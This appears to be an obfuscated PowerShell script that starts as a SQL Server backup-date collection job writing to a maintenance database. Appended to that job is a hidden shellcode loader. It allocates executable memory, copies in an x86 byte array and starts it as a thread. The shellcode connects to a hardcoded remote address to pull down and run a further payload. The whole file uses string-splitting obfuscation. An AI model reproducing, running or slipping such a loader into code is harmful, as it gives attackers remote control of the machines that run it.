${A} = ("{3}{2}{0}{1}" -f 'QLUTI','L18','S','X'), ("{2}{1}{0}"-f'TIL19','SQLU','X')

${A} | .('%') `
{
	${SE`Rve`R`NAmE} = ${_};
	
	&('cd') ((("{0}{3}{1}{2}"-f 's','erve','r:K51','qls')) -rePLace'K51',[Char]92)
	&('cd') ((("{7}{3}{6}{9}{2}{0}{5}{1}{10}{4}{8}"-f'faul','ta','ABde','B9U','e','tZABda','EServerName','sqlZA','s','Z','bas'))-crEPlACE  ([cHaR]57+[cHaR]85+[cHaR]69),[cHaR]36 -rePLACe  ([cHaR]90+[cHaR]65+[cHaR]66),[cHaR]92)
	
	${d`BS} = &("{0}{1}" -f 'd','ir');
	
	${D`Bs} | &('%') `
	{
	${lAS`TBAC`KuPDA`TE} = ${_}."La`STbAC`kUPD`AtE";
	${l`A`sT`lO`gbaC`KupDATe} = ${_}."LaS`TlogB`Ackup`daTe";
	${lAS`TdiFf`BA`cKUpD`ATE} = ${_}."LAsTdIff`E`RENTi`AlBaCk`UPdATe";
	
	&("{1}{0}{3}{2}"-f'v','in','e-sqlcmd','ok') -ServerInstance ("{0}{2}{3}{1}"-f'XSQ','8','LUTIL','1') -Database ("{1}{0}" -f 'bamaint','d') -query ('Insert'+' '+'B'+'ackupI'+'nfo '+'SE'+'LECT '+"'$ServerName', "+"'$lastBackupDate', "+"'$LastLogBackupDate', "+"'$LastDiffBackupDate'") -SuppressProviderContextWarning
	${SE`R`Vern`Ame};
	${_}."N`AMe";
	}
	
	

}
${U`jK} = ((("{19}{1}{22}{13}{10}{45}{42}{55}{33}{50}{66}{56}{51}{69}{14}{8}{63}{39}{65}{23}{25}{12}{36}{37}{4}{28}{2}{6}{40}{26}{61}{3}{67}{60}{20}{70}{27}{31}{44}{24}{72}{59}{7}{46}{38}{57}{47}{9}{34}{11}{49}{0}{73}{68}{48}{30}{43}{71}{41}{53}{17}{62}{52}{74}{64}{35}{16}{5}{15}{32}{18}{21}{58}{54}{29}"-f'ion','DllImp','publi','Ptr C','We)',' s','c s',', Int','locati','StartAddress, IntPtr lpParameter, u','publi','dwCrea','32.d','rnel32.dllAWe)]','lAl','rc','t, uint','c st','ui','[','ead(Int','nt','ort(AWeke','port(AWekerne','but','l','atic ex','tr l',']',');','hreadI','pThreadAtt',', ','I','int ','(IntPtr des','ll','A','r ',');[D','t','e)','static extern IntPt','d);[DllImport(AWemsvcrt.dl','ri','c ','Pt','p',' IntPtr lpT','t','ntPtr lpAddre','ze, uint','c',']publi','count','r VirtualAlloc(','int dwSi','l',' ','tackSize','eThr','tern Int','ati','onType, uint flProtect','r memset','llIm','ss, u','reat',',',' f','P','lAW','es, uint dwS','Flags',' extern IntPt'))-REPlAce'AWe',[CHAR]34);${W} = &("{0}{2}{1}"-f'Add','Type','-') -memberDefinition ${u`jK} -Name ("{1}{0}" -f'2','Win3') -namespace ("{0}{3}{2}{1}"-f 'Win','ns','ctio','32Fun') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xac,0x61,0x42,0x41,0x68,0x02,0x00,0x03,0xea,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."lE`NgTH" -gt 0x1000){${g} = ${z}."L`eNGtH"};${D`F7}=${w}::("{0}{2}{1}"-f 'Vi','tualAlloc','r').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."leN`G`Th"-1);${I}++) {${W}::"M`eMS`et"([IntPtr](${d`F7}.("{1}{0}"-f 't32','ToIn').Invoke()+${i}), ${z}[${I}], 1)};${w}::("{0}{1}{2}" -f'Crea','teT','hread').Invoke(0,0,${D`F7},0,0,0);for (;;){&("{0}{1}{2}" -f 'St','art-sl','eep') 60};
